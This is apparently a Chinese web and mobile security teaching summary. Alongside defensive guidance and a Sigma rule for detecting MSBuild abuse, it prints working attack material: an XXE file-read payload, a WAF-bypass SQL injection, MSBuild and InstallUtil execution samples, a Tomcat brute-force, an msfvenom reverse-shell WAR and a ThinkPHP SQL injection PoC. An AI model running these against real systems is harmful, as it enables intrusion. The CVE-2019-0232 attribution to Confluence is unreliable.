专注Web及移动安全[红日安全80期]
字数 1574 2025-08-18 11:38:28

红日安全80期:Web及移动安全深度教学文档

一、安全动态专题

1. IDPS部署指南

  • 核心概念:入侵检测与防御系统(Intrusion Detection and Prevention System)
  • 部署要点
    • 网络拓扑分析:确定关键资产位置
    • 传感器部署策略:网络边界、DMZ、内网核心区
    • 规则库配置:基于威胁情报更新频率
    • 性能调优:避免误报与漏报平衡

2. 蓝方技术体系

  • 防御技术栈
    • 端点检测与响应(EDR)
    • 安全信息与事件管理(SIEM)
    • 网络流量分析(NTA)
    • 欺骗防御技术(Deception)
  • 实战要点
    • 日志收集标准化(Syslog/WEF)
    • 威胁狩猎方法论
    • 应急响应流程SOP

3. 等级保护测评

  • 等保2.0核心要求
    • 安全区域边界:访问控制、入侵防范
    • 安全计算环境:身份鉴别、访问控制
    • 安全管理中心:集中管控
    • 重要数据保护:加密存储传输

二、Web安全深度解析

1. XXE漏洞实战

  • 漏洞原理
    <!-- 恶意DTD示例 -->
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<foo>&xxe;</foo>
  • 利用场景
    • 文件读取(/etc/passwd)
    • SSRF攻击(内部服务探测)
    • 盲注数据外带(OOB攻击)

2. SSRF进阶利用

  • 绕过技术
    • DNS重绑定攻击
    • 302跳转绕过
    • URL解析差异利用(@符号、斜杠混淆)
  • Getshell路径
    • 云元数据API滥用(AWS/Azure/GCP)
    • Redis未授权访问利用
    • 内网Jenkins/RCE漏洞链

3. RPO相对路径覆盖

  • 技术本质:CSS解析与路径规范化差异
  • 攻击流程
    1. 诱骗用户访问/path/to?vulnerable=param
    2. 服务器返回包含相对路径CSS的页面
    3. 浏览器解析CSS时加载攻击者控制的资源

4. WAF绕过技术

  • 分块传输编码
    POST /vuln HTTP/1.1
Transfer-Encoding: chunked

7
keyword=
8
admin'--
0
  • 其他技术
    • HTTP参数污染
    • Unicode规范化
    • 注释混淆(/!50000/)

三、渗透测试实战技巧

1. 白名单绕过技术

  • Msbuild.exe利用

    <!-- malicious.proj -->
<Project ToolsVersion="4.0" xmlns="...">
  <Target Name="Exec">
    <Exec Command="calc.exe"/>
  </Target>
</Project>

    msbuild.exe malicious.proj

  • InstallUtil.exe利用

    // 恶意C#代码编译为dll
[System.ComponentModel.RunInstaller(true)]
public class Malicious : System.Configuration.Install.Installer {
    public override void Uninstall(IDictionary savedState) {
        System.Diagnostics.Process.Start("calc.exe");
    }
}

    InstallUtil.exe /U malicious.dll

2. 数据库渗透技巧

  • Tomcat密码破解
    msfconsole
use auxiliary/scanner/http/tomcat_mgr_login
set RHOSTS target_ip
set RPORT 8080
set USER_FILE /path/to/users.txt
set PASS_FILE /path/to/passwords.txt
run
  • War包部署
    1. 生成恶意war:msfvenom -p java/jsp_shell_reverse_tcp LHOST=yourip LPORT=4444 -f war > shell.war
    2. 通过管理界面上传部署
    3. 触发访问获取反向shell

四、代码审计专项

1. .NET反序列化漏洞

  • NetDataContractSerializer风险
    // 危险反序列化代码
using (var stream = new MemoryStream(serializedData)) {
    var serializer = new NetDataContractSerializer();
    return serializer.Deserialize(stream);
}
  • 防御方案
    • 使用DataContractSerializer替代
    • 实现SerializationBinder进行类型限制

2. ThinkPHP5 SQL注入

  • 漏洞链分析
    • 入口:where条件构造
    • 关键缺陷:表达式解析未严格过滤
    • 利用点:$this->parseWhereItem方法
  • POC示例
    // 恶意参数构造
$map = ['id' => ['exp', "=1 union select 1,user(),3,4"]];
Db::table('users')->where($map)->select();

五、移动安全要点补充

1. 常见移动端风险

  • 不安全的数据存储
    • SharedPreferences明文存储敏感数据
    • SQLite数据库未加密
    • 日志泄露敏感信息
  • 防御方案
    • 使用Android Keystore系统
    • 实现基于Biometric的加密

2. 混合应用安全

  • WebView风险
    // 危险配置示例
webView.getSettings().setJavaScriptEnabled(true);
webView.setWebChromeClient(new WebChromeClient());
  • 安全加固
    • 禁用file协议访问
    • 实现URL白名单过滤
    • 关闭密码保存功能

六、防御体系建设

1. 纵深防御策略

  • 网络层:VPC分段+微隔离
  • 主机层:HIDS部署+系统加固
  • 应用层:WAF+RASP联动
  • 数据层:DLP+加密保护

2. 威胁检测优化

  • 检测规则编写要点
    # Sigma规则示例
title: Suspicious MSBuild Execution
status: experimental
description: Detects suspicious MSBuild.exe execution
references:
    - https://redteam.tips
logsource:
    product: windows
    service: sysmon
detection:
    selection:
        EventID: 1
        Image: '*\MSBuild.exe'
        CommandLine: '*.proj'
    condition: selection
falsepositives:
    - Legitimate build processes
level: high

本教学文档涵盖了红日安全80期核心知识点,建议结合实战环境进行验证测试。持续关注漏洞预警(如Confluence目录穿越CVE-2019-0232)并建立漏洞快速响应机制是保持安全防护有效性的关键。

红日安全80期:Web及移动安全深度教学文档 一、安全动态专题 1. IDPS部署指南 核心概念 :入侵检测与防御系统(Intrusion Detection and Prevention System) 部署要点 : 网络拓扑分析:确定关键资产位置 传感器部署策略:网络边界、DMZ、内网核心区 规则库配置:基于威胁情报更新频率 性能调优:避免误报与漏报平衡 2. 蓝方技术体系 防御技术栈 : 端点检测与响应(EDR) 安全信息与事件管理(SIEM) 网络流量分析(NTA) 欺骗防御技术(Deception) 实战要点 : 日志收集标准化(Syslog/WEF) 威胁狩猎方法论 应急响应流程SOP 3. 等级保护测评 等保2.0核心要求 : 安全区域边界:访问控制、入侵防范 安全计算环境:身份鉴别、访问控制 安全管理中心:集中管控 重要数据保护:加密存储传输 二、Web安全深度解析 1. XXE漏洞实战 漏洞原理 : 利用场景 : 文件读取(/etc/passwd) SSRF攻击(内部服务探测) 盲注数据外带(OOB攻击) 2. SSRF进阶利用 绕过技术 : DNS重绑定攻击 302跳转绕过 URL解析差异利用(@符号、斜杠混淆) Getshell路径 : 云元数据API滥用(AWS/Azure/GCP) Redis未授权访问利用 内网Jenkins/RCE漏洞链 3. RPO相对路径覆盖 技术本质 :CSS解析与路径规范化差异 攻击流程 : 诱骗用户访问 /path/to?vulnerable=param 服务器返回包含相对路径CSS的页面 浏览器解析CSS时加载攻击者控制的资源 4. WAF绕过技术 分块传输编码 : 其他技术 : HTTP参数污染 Unicode规范化 注释混淆(/ !50000 /) 三、渗透测试实战技巧 1. 白名单绕过技术 Msbuild.exe利用 : InstallUtil.exe利用 : 2. 数据库渗透技巧 Tomcat密码破解 : War包部署 : 生成恶意war: msfvenom -p java/jsp_shell_reverse_tcp LHOST=yourip LPORT=4444 -f war > shell.war 通过管理界面上传部署 触发访问获取反向shell 四、代码审计专项 1. .NET反序列化漏洞 NetDataContractSerializer风险 : 防御方案 : 使用DataContractSerializer替代 实现SerializationBinder进行类型限制 2. ThinkPHP5 SQL注入 漏洞链分析 : 入口: where 条件构造 关键缺陷:表达式解析未严格过滤 利用点: $this->parseWhereItem 方法 POC示例 : 五、移动安全要点补充 1. 常见移动端风险 不安全的数据存储 : SharedPreferences明文存储敏感数据 SQLite数据库未加密 日志泄露敏感信息 防御方案 : 使用Android Keystore系统 实现基于Biometric的加密 2. 混合应用安全 WebView风险 : 安全加固 : 禁用file协议访问 实现URL白名单过滤 关闭密码保存功能 六、防御体系建设 1. 纵深防御策略 网络层 :VPC分段+微隔离 主机层 :HIDS部署+系统加固 应用层 :WAF+RASP联动 数据层 :DLP+加密保护 2. 威胁检测优化 检测规则编写要点 : 本教学文档涵盖了红日安全80期核心知识点,建议结合实战环境进行验证测试。持续关注漏洞预警(如Confluence目录穿越CVE-2019-0232)并建立漏洞快速响应机制是保持安全防护有效性的关键。